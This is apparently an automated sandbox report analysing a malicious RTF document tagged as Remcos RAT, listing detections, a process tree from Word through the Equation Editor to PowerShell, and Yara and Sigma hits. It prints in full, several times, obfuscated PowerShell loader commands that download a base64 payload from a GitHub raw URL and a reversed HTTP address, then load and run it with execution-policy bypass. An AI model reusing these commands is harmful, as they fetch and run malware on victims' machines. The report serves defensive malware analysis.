Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IpEmBW3Qw5.rtf

Overview

General Information

Sample name:IpEmBW3Qw5.rtf
renamed because original name is a hash value
Original sample name:85bb9c92d8128e3c8cf070a813b9ba82.rtf
Analysis ID:1526389
MD5:85bb9c92d8128e3c8cf070a813b9ba82
SHA1:cc187bf0c745ccd7fb932faa2ee030bb404ab1eb
SHA256:71e0b0884fbf2ba2f8c52e90ae66f5be792d6b1f67d4ef86226958cc0bba3970
Tags:RATRemcosRATrtfuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Found potential equation exploit (CVE-2017-11882)
Installs new ROOT certificates
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3264 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3344 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3500 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\newprojectwithnewthingstobecom.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3548 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTlY6Y29tc3BFY1s0LDE1LDI1XS1qT0lOJycpICgoJ0licHUnKydybCcrJyA9IGd6Smh0dHBzOicrJy8vJysncmF3LicrJ2dpdGh1YnVzZXInKydjb250JysnZW50LmNvbS9Ob0RldGVjJysndCcrJ09uL05vRCcrJ2V0ZWN0TycrJ24nKycvcmUnKydmcycrJy9oZScrJ2Fkcy9tJysnYWknKyduLycrJ0RlJysndGFoTm90JysnaC1WLicrJ3R4JysndGcnKyd6SjsgSWInKydwYmFzZTY0JysnQ29uJysndGVudCA9JysnIChOZXcnKyctJysnT2JqJysnZWN0IFMnKyd5c3QnKydlbS5OZXQnKycuV2ViJysnQ2xpZW50KS5Eb3duJysnbG8nKydhZFMnKyd0cmluJysnZycrJyhJYnB1cmwnKycpOyBJYnBiaW5hcnknKydDb250ZW50ID0gJysnWycrJ1N5Jysnc3RlbS5Db252ZXJ0XTo6RnJvJysnbUInKydhc2U2NCcrJ1N0cmluJysnZyhJYnBiJysnYScrJ3NlNjRDbycrJ250ZW50JysnKTsgSWJwYXNzZW1ibCcrJ3kgPSAnKydbUicrJ2UnKydmbCcrJ2VjdGlvbicrJy5Bc3NlbWJseV0nKyc6OkxvYWQoSWJwYmluYXJ5JysnQycrJ28nKydudGVudCk7IFtkbmxpYi5JTy5Ib21lXTonKyc6VkFJKHA3anR4dC5WRycrJ0ZSUi8wMDEvMDInKycuMDIyLjMuMjknKycxJysnLy8nKyc6cHR0aHAnKyc3aiwnKycgcDcnKydqZGVzYXRpdmFkb3A3aiwgcCcrJzdqZGUnKydzYXRpdicrJ2Fkb3A3aiwnKycgcDcnKydqZGVzYXRpdmFkbycrJ3A3aicrJywgcDdqUmVnQXNtJysncDdqJysnLCBwNycrJ2pwN2oscDcnKydqcDdqKScpLlJlcGxhQ2UoJ2d6SicsW1NUUkluZ11bQ2hhUl0zOSkuUmVwbGFDZSgncDdqJyxbU1RSSW5nXVtDaGFSXTM0KS5SZXBsYUNlKCdJYnAnLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3652 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENV:comspEc[4,15,25]-jOIN'') (('Ibpu'+'rl'+' = gzJhttps:'+'//'+'raw.'+'githubuser'+'cont'+'ent.com/NoDetec'+'t'+'On/NoD'+'etectO'+'n'+'/re'+'fs'+'/he'+'ads/m'+'ai'+'n/'+'De'+'tahNot'+'h-V.'+'tx'+'tg'+'zJ; Ib'+'pbase64'+'Con'+'tent ='+' (New'+'-'+'Obj'+'ect S'+'yst'+'em.Net'+'.Web'+'Client).Down'+'lo'+'adS'+'trin'+'g'+'(Ibpurl'+'); Ibpbinary'+'Content = '+'['+'Sy'+'stem.Convert]::Fro'+'mB'+'ase64'+'Strin'+'g(Ibpb'+'a'+'se64Co'+'ntent'+'); Ibpassembl'+'y = '+'[R'+'e'+'fl'+'ection'+'.Assembly]'+'::Load(Ibpbinary'+'C'+'o'+'ntent); [dnlib.IO.Home]:'+':VAI(p7jtxt.VG'+'FRR/001/02'+'.022.3.29'+'1'+'//'+':ptthp'+'7j,'+' p7'+'jdesativadop7j, p'+'7jde'+'sativ'+'adop7j,'+' p7'+'jdesativado'+'p7j'+', p7jRegAsm'+'p7j'+', p7'+'jp7j,p7'+'jp7j)').ReplaCe('gzJ',[STRIng][ChaR]39).ReplaCe('p7j',[STRIng][ChaR]34).ReplaCe('Ibp','$') )" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
IpEmBW3Qw5.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x173e:$obj1: \objhtml
  • 0x1778:$obj2: \objdata
  • 0x1762:$obj3: \objupdate
SourceRuleDescriptionAuthorStrings
C:\Users\user\Desktop\~WRD0000.tmpINDICATOR_RTF_EXPLOIT_CVE_2017_8759_2detects CVE-2017-8759 weaponized RTF documents.ditekSHen
  • 0xb9eb:$clsid3: 4d73786d6c322e534158584d4c5265616465722e
  • 0xba35:$ole2: d0cf11e0a1b11ae1
  • 0x63d5:$obj2: \objdata
  • 0x63b3:$obj4: \objemb
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 3548INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x6187:$b3: ::UTF8.GetString(
  • 0x66d9:$b3: ::UTF8.GetString(
  • 0x722b:$b3: ::UTF8.GetString(
  • 0x7926:$b3: ::UTF8.GetString(
  • 0x2b5ac:$b3: ::UTF8.GetString(
  • 0x2ed24:$b3: ::UTF8.GetString(
  • 0x30b3f:$b3: ::UTF8.GetString(
  • 0x31089:$b3: ::UTF8.GetString(
  • 0x6e058:$b3: ::UTF8.GetString(
  • 0x6ecc9:$b3: ::UTF8.GetString(
  • 0x6f225:$b3: ::UTF8.GetString(
  • 0x7bc55:$b3: ::UTF8.GetString(
  • 0x7c1a7:$b3: ::UTF8.GetString(
  • 0x7c8e5:$b3: ::UTF8.GetString(
  • 0x7cfff:$b3: ::UTF8.GetString(
  • 0x7e6e8:$b3: ::UTF8.GetString(
  • 0x7e796:$b3: ::UTF8.GetString(
  • 0x7ecb8:$b3: ::UTF8.GetString(
  • 0x8688a:$b3: ::UTF8.GetString(
  • 0x8b604:$b3: ::UTF8.GetString(
  • 0x8bb4f:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 3652INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x166430:$b2: ::FromBase64String(
  • 0x167b97:$b2: ::FromBase64String(
  • 0x18641:$s1: -jOIN
  • 0xee50c:$s1: -jOIN
  • 0x12258d:$s1: -join
  • 0x122d44:$s1: -join
  • 0x15f9ce:$s1: -jOIN
  • 0x173c21:$s1: -join
  • 0x20611b:$s1: -jOIN
  • 0x20d764:$s1: -jOIN
  • 0x20db15:$s1: -jOIN
  • 0x22a7e3:$s1: -join
  • 0x230720:$s1: -jOIN
  • 0x23bdef:$s1: -join
  • 0x248db9:$s1: -join
  • 0x24c11a:$s1: -join
  • 0x24c7ab:$s1: -join
  • 0x24e20f:$s1: -join
  • 0x2503a0:$s1: -join
  • 0x250bc7:$s1: -join
  • 0x251437:$s1: -join

Exploits

barindex
Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.3.220.20, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3344, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3344, TargetFilename: C:\Users\user\AppData\Roaming\newprojectwithnewthingstobecom.vBS

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTlY6Y29tc3BFY1s0LDE1LDI1XS1qT0lOJycpICgoJ0licHUnKydybCcrJyA9IGd6Smh0dHBzOicrJy8vJysncmF3LicrJ2dpdGh1YnVzZXInKydjb250JysnZW50LmNvbS9Ob0RldGVjJysndCcrJ09uL05vRCcrJ2V0ZWN0TycrJ24nKycvcmUnKydmcycrJy9oZScrJ2Fkcy9tJysnYWknKyduLycrJ0RlJysndGFoTm90JysnaC1WLicrJ3R4JysndGcnKyd6SjsgSWInKydwYmFzZTY0JysnQ29uJysndGVudCA9JysnIChOZXcnKyctJysnT2JqJysnZWN0IFMnKyd5c3QnKydlbS5OZXQnKycuV2ViJysnQ2xpZW50KS5Eb3duJysnbG8nKydhZFMnKyd0cmluJysnZycrJyhJYnB1cmwnKycpOyBJYnBiaW5hcnknKydDb250ZW50ID0gJysnWycrJ1N5Jysnc3RlbS5Db252ZXJ0XTo6RnJvJysnbUInKydhc2U2NCcrJ1N0cmluJysnZyhJYnBiJysnYScrJ3NlNjRDbycrJ250ZW50JysnKTsgSWJwYXNzZW1ibCcrJ3kgPSAnKydbUicrJ2UnKydmbCcrJ2VjdGlvbicrJy5Bc3NlbWJseV0nKyc6OkxvYWQoSWJwYmluYXJ5JysnQycrJ28nKydudGVudCk7IFtkbmxpYi5JTy5Ib21lXTonKyc6VkFJKHA3anR4dC5WRycrJ0ZSUi8wMDEvMDInKycuMDIyLjMuMjknKycxJysnLy8nKyc6cHR0aHAnKyc3aiwnKycgcDcnKydqZGVzYXRpdmFkb3A3aiwgcCcrJzdqZGUnKydzYXRpdicrJ2Fkb3A3aiwnKycgcDcnKydqZGVzYXRpdmFkbycrJ3A3aicrJywgcDdqUmVnQXNtJysncDdqJysnLCBwNycrJ2pwN2oscDcnKydqcDdqKScpLlJlcGxhQ2UoJ2d6SicsW1NUUkluZ11bQ2hhUl0zOSkuUmVwbGFDZSgncDdqJyxbU1RSSW5nXVtDaGFSXTM0KS5SZXBsYUNlKCdJYnAnLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTlY6Y29tc3BFY1s0LDE1LDI1XS1qT0lOJycpICgoJ0licHUnKydybCcrJyA9IGd6Smh0dHBzOicrJy8vJysncmF3LicrJ2dpdGh1YnVzZXInKydjb250JysnZW50LmNvbS9Ob0RldGVjJysndCcrJ09uL05vRCcrJ2V0ZWN0TycrJ24nKycvcmUnKydmcycrJy9oZScrJ2Fkcy9tJysnYWknKyduLycrJ0RlJysndGFoTm90JysnaC1WLicrJ3R4JysndGcnKyd6SjsgSWInKydwYmFzZTY0JysnQ29uJysndGVudCA9JysnIChOZXcnKyctJysnT2JqJysnZWN0IFMnKyd5c3QnKydlbS5OZXQnKycuV2ViJysnQ2xpZW50KS5Eb3duJysnbG8nKydhZFMnKyd0cmluJysnZycrJyhJYnB1cmwnKycpOyBJYnBiaW5hcnknKydDb250ZW50ID0gJysnWycrJ1N5Jysnc3RlbS5Db252ZXJ0XTo6RnJvJysnbUInKydhc2U2NCcrJ1N0cmluJysnZyhJYnBiJysnYScrJ3NlNjRDbycrJ250ZW50JysnKTsgSWJwYXNzZW1ibCcrJ3kgPSAnKydbUicrJ2UnKydmbCcrJ2VjdGlvbicrJy5Bc3NlbWJseV0nKyc6OkxvYWQoSWJwYmluYXJ5JysnQycrJ28nKydudGVudCk7IFtkbmxpYi5JTy5Ib21lXTonKyc6VkFJKHA3anR4dC5WRycrJ0ZSUi8wMDEvMDInKycuMDIyLjMuMjknKycxJysnLy8nKyc6cHR0aHAnKyc3aiwnKycgcDcnKydqZGVzYXRpdmFkb3A3aiwgcCcrJzdqZGUnKydzYXRpdicrJ2Fkb3A3aiwnKycgcDcnKydqZGVzYXRpdmFkbycrJ3A3aicrJywgcDdqUmVnQXNtJysncDdqJysnLCBwNycrJ2pwN2oscDcnKydqcDdqKScpLlJlcGxhQ2UoJ2d6SicsW1NUUkluZ11bQ2hhUl0zOSkuUmVwbGFDZSgncDdqJyxbU1RSSW5nXVtDaGFSXTM0KS5SZXBsYUNlKCdJYnAnLCckJykgKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\Window
Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3344, Protocol: tcp, SourceIp: 192.3.220.20, SourceIsIpv6: false, SourcePort: 80
Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENV:comspEc[4,15,25]-jOIN'') (('Ibpu'+'rl'+' = gzJhttps:'+'//'+'raw.'+'githubuser'+'cont'+'ent.com/NoDetec'+'t'+'On/NoD'+'etectO'+'n'+'/re'+'fs'+'/he'+'ads/m'+'ai'+'n/'+'De'+'tahNot'+'h-V.'+'tx'+'tg'+'zJ; Ib'+'pbase64'+'Con'+'tent ='+' (New'+'-'+'Obj'+'ect S'+'yst'+'em.Net'+'.Web'+'Client).Down'+'lo'+'adS'+'trin'+'g'+'(Ibpurl'+'); Ibpbinary'+'Content = '+'['+'Sy'+'stem.Convert]::Fro'+'mB'+'ase64'+'Strin'+'g(Ibpb'+'a'+'se64Co'+'ntent'+'); Ibpassembl'+'y = '+'[R'+'e'+'fl'+'ection'+'.Assembly]'+'::Load(Ibpbinary'+'C'+'o'+'ntent); [dnlib.IO.Home]:'+':VAI(p7jtxt.VG'+'FRR/001/02'+'.022.3.29'+'1'+'//'+':ptthp'+'7j,'+' p7'+'jdesativadop7j, p'+'7jde'+'sativ'+'adop7j,'+' p7'+'jdesativado'+'p7j'+', p7jRegAsm'+'p7j'+', p7'+'jp7j,p7'+'jp7j)').ReplaCe('gzJ',[STRIng][ChaR]39).ReplaCe('p7j',[STRIng][ChaR]34).ReplaCe('Ibp','$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENV:comspEc[4,15,25]-jOIN'') (('Ibpu'+'rl'+' = gzJhttps:'+'//'+'raw.'+'githubuser'+'cont'+'ent.com/NoDetec'+'t'+'On/NoD'+'etectO'+'n'+'/re'+'fs'+'/he'+'ads/m'+'ai'+'n/'+'De'+'tahNot'+'h-V.'+'tx'+'tg'+'zJ; Ib'+'pbase64'+'Con'+'tent ='+' (New'+'-'+'Obj'+'ect S'+'yst'+'em.Net'+'.Web'+'Client).Down'+'lo'+'adS'+'trin'+'g'+'(Ibpurl'+'); Ibpbinary'+'Content = '+'['+'Sy'+'stem.Convert]::Fro'+'mB'+'ase64'+'Strin'+'g(Ibpb'+'a'+'se64Co'+'ntent'+'); Ibpassembl'+'y = '+'[R'+'e'+'fl'+'ection'+'.Assembly]'+'::Load(Ibpbinary'+'C'+'o'+'ntent); [dnlib.IO.Home]:'+':VAI(p7jtxt.VG'+'FRR/001/02'+'.022.3.29'+'1'+'//'+':ptthp'+'7j,'+' p7'+'jdesativadop7j, p'+'7jde'+'sativ'+'adop7j,'+' p7'+'jdesativado'+'p7j'+', p7jRegAsm'+'p7j'+', p7'+'jp7j,p7'+'jp7j)').ReplaCe('gzJ',[STRIng][ChaR]39).ReplaCe('p7j',[STRIng][ChaR]34).ReplaCe('Ibp','$') )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTlY6Y29tc3BFY1s0LDE1LDI1XS1qT0lOJycpICgoJ0licHUnKydybCcrJyA9IGd6Smh0dHBzOicrJy8vJysncmF3LicrJ2dpdGh1YnVzZXInKydjb250JysnZW50LmNvbS9Ob0RldGVjJysndCcrJ09uL05vRCcrJ2V0ZWN0TycrJ24nKycvcmUnKydmcycrJy9oZScrJ2Fkcy9tJysnYWknKyduLycrJ0RlJysndGFoTm90JysnaC1WLicrJ3R4JysndGcnKyd6SjsgSWInKydwYmFzZTY0JysnQ29uJysndGVudCA9JysnIChOZXcnKyctJysnT2JqJysnZWN0IFMnKyd5c3QnKydlbS5OZXQnKycuV2ViJysnQ2xpZW50KS5Eb3duJysnbG8nKydhZFMnKyd0cmluJysnZycrJyhJYnB1cmwnKycpOyBJYnBiaW5hcnknKydDb250ZW50ID0gJysnWycrJ1N5Jysnc3RlbS5Db252ZXJ0XTo6RnJvJysnbUInKydhc2U2NCcrJ1N0cmluJysnZyhJYnBiJysnYScrJ3NlNjRDbycrJ250ZW50JysnKTsgSWJwYXNzZW1ibCcrJ3kgPSAnKydbUicrJ2UnKydmbCcrJ2VjdGlvbicrJy5Bc3NlbWJseV0nKyc6OkxvYWQoSWJwYmluYXJ5Jys
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENV:comspEc[4,15,25]-jOIN'') (('Ibpu'+'rl'+' = gzJhttps:'+'//'+'raw.'+'githubuser'+'cont'+'ent.com/NoDetec'+'t'+'On/NoD'+'etectO'+'n'+'/re'+'fs'+'/he'+'ads/m'+'ai'+'n/'+'De'+'tahNot'+'h-V.'+'tx'+'tg'+'zJ; Ib'+'pbase64'+'Con'+'tent ='+' (New'+'-'+'Obj'+'ect S'+'yst'+'em.Net'+'.Web'+'Client).Down'+'lo'+'adS'+'trin'+'g'+'(Ibpurl'+'); Ibpbinary'+'Content = '+'['+'Sy'+'stem.Convert]::Fro'+'mB'+'ase64'+'Strin'+'g(Ibpb'+'a'+'se64Co'+'ntent'+'); Ibpassembl'+'y = '+'[R'+'e'+'fl'+'ection'+'.Assembly]'+'::Load(Ibpbinary'+'C'+'o'+'ntent); [dnlib.IO.Home]:'+':VAI(p7jtxt.VG'+'FRR/001/02'+'.022.3.29'+'1'+'//'+':ptthp'+'7j,'+' p7'+'jdesativadop7j, p'+'7jde'+'sativ'+'adop7j,'+' p7'+'jdesativado'+'p7j'+', p7jRegAsm'+'p7j'+', p7'+'jp7j,p7'+'jp7j)').ReplaCe('gzJ',[STRIng][ChaR]39).ReplaCe('p7j',[STRIng][ChaR]34).ReplaCe('Ibp','$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENV:comspEc[4,15,25]-jOIN'') (('Ibpu'+'rl'+' = gzJhttps:'+'//'+'raw.'+'githubuser'+'cont'+'ent.com/NoDetec'+'t'+'On/NoD'+'etectO'+'n'+'/re'+'fs'+'/he'+'ads/m'+'ai'+'n/'+'De'+'tahNot'+'h-V.'+'tx'+'tg'+'zJ; Ib'+'pbase64'+'Con'+'tent ='+' (New'+'-'+'Obj'+'ect S'+'yst'+'em.Net'+'.Web'+'Client).Down'+'lo'+'adS'+'trin'+'g'+'(Ibpurl'+'); Ibpbinary'+'Content = '+'['+'Sy'+'stem.Convert]::Fro'+'mB'+'ase64'+'Strin'+'g(Ibpb'+'a'+'se64Co'+'ntent'+'); Ibpassembl'+'y = '+'[R'+'e'+'fl'+'ection'+'.Assembly]'+'::Load(Ibpbinary'+'C'+'o'+'ntent); [dnlib.IO.Home]:'+':VAI(p7jtxt.VG'+'FRR/001/02'+'.022.3.29'+'1'+'//'+':ptthp'+'7j,'+' p7'+'jdesativadop7j, p'+'7jde'+'sativ'+'adop7j,'+' p7'+'jdesativado'+'p7j'+', p7jRegAsm'+'p7j'+', p7'+'jp7j,p7'+'jp7j)').ReplaCe('gzJ',[STRIng][ChaR]39).ReplaCe('p7j',[STRIng][ChaR]34).ReplaCe('Ibp','$') )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTlY6Y29tc3BFY1s0LDE1LDI1XS1qT0lOJycpICgoJ0licHUnKydybCcrJyA9IGd6Smh0dHBzOicrJy8vJysncmF3LicrJ2dpdGh1YnVzZXInKydjb250JysnZW50LmNvbS9Ob0RldGVjJysndCcrJ09uL05vRCcrJ2V0ZWN0TycrJ24nKycvcmUnKydmcycrJy9oZScrJ2Fkcy9tJysnYWknKyduLycrJ0RlJysndGFoTm90JysnaC1WLicrJ3R4JysndGcnKyd6SjsgSWInKydwYmFzZTY0JysnQ29uJysndGVudCA9JysnIChOZXcnKyctJysnT2JqJysnZWN0IFMnKyd5c3QnKydlbS5OZXQnKycuV2ViJysnQ2xpZW50KS5Eb3duJysnbG8nKydhZFMnKyd0cmluJysnZycrJyhJYnB1cmwnKycpOyBJYnBiaW5hcnknKydDb250ZW50ID0gJysnWycrJ1N5Jysnc3RlbS5Db252ZXJ0XTo6RnJvJysnbUInKydhc2U2NCcrJ1N0cmluJysnZyhJYnBiJysnYScrJ3NlNjRDbycrJ250ZW50JysnKTsgSWJwYXNzZW1ibCcrJ3kgPSAnKydbUicrJ2UnKydmbCcrJ2VjdGlvbicrJy5Bc3NlbWJseV0nKyc6OkxvYWQoSWJwYmluYXJ5Jys
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENV:comspEc[4,15,25]-jOIN'') (('Ibpu'+'rl'+' = gzJhttps:'+'//'+'raw.'+'githubuser'+'cont'+'ent.com/NoDetec'+'t'+'On/NoD'+'etectO'+'n'+'/re'+'fs'+'/he'+'ads/m'+'ai'+'n/'+'De'+'tahNot'+'h-V.'+'tx'+'tg'+'zJ; Ib'+'pbase64'+'Con'+'tent ='+' (New'+'-'+'Obj'+'ect S'+'yst'+'em.Net'+'.Web'+'Client).Down'+'lo'+'adS'+'trin'+'g'+'(Ibpurl'+'); Ibpbinary'+'Content = '+'['+'Sy'+'stem.Convert]::Fro'+'mB'+'ase64'+'Strin'+'g(Ibpb'+'a'+'se64Co'+'ntent'+'); Ibpassembl'+'y = '+'[R'+'e'+'fl'+'ection'+'.Assembly]'+'::Load(Ibpbinary'+'C'+'o'+'ntent); [dnlib.IO.Home]:'+':VAI(p7jtxt.VG'+'FRR/001/02'+'.022.3.29'+'1'+'//'+':ptthp'+'7j,'+' p7'+'jdesativadop7j, p'+'7jde'+'sativ'+'adop7j,'+' p7'+'jdesativado'+'p7j'+', p7jRegAsm'+'p7j'+', p7'+'jp7j,p7'+'jp7j)').ReplaCe('gzJ',[STRIng][ChaR]39).ReplaCe('p7j',[STRIng][ChaR]34).ReplaCe('Ibp','$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENV:comspEc[4,15,25]-jOIN'') (('Ibpu'+'rl'+' = gzJhttps:'+'//'+'raw.'+'githubuser'+'cont'+'ent.com/NoDetec'+'t'+'On/NoD'+'etectO'+'n'+'/re'+'fs'+'/he'+'ads/m'+'ai'+'n/'+'De'+'tahNot'+'h-V.'+'tx'+'tg'+'zJ; Ib'+'pbase64'+'Con'+'tent ='+' (New'+'-'+'Obj'+'ect S'+'yst'+'em.Net'+'.Web'+'Client).Down'+'lo'+'adS'+'trin'+'g'+'(Ibpurl'+'); Ibpbinary'+'Content = '+'['+'Sy'+'stem.Convert]::Fro'+'mB'+'ase64'+'Strin'+'g(Ibpb'+'a'+'se64Co'+'ntent'+'); Ibpassembl'+'y = '+'[R'+'e'+'fl'+'ection'+'.Assembly]'+'::Load(Ibpbinary'+'C'+'o'+'ntent); [dnlib.IO.Home]:'+':VAI(p7jtxt.VG'+'FRR/001/02'+'.022.3.29'+'1'+'//'+':ptthp'+'7j,'+' p7'+'jdesativadop7j, p'+'7jde'+'sativ'+'adop7j,'+' p7'+'jdesativado'+'p7j'+', p7jRegAsm'+'p7j'+', p7'+'jp7j,p7'+'jp7j)').ReplaCe('gzJ',[STRIng][ChaR]39).ReplaCe('p7j',[STRIng][ChaR]34).ReplaCe('Ibp','$') )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 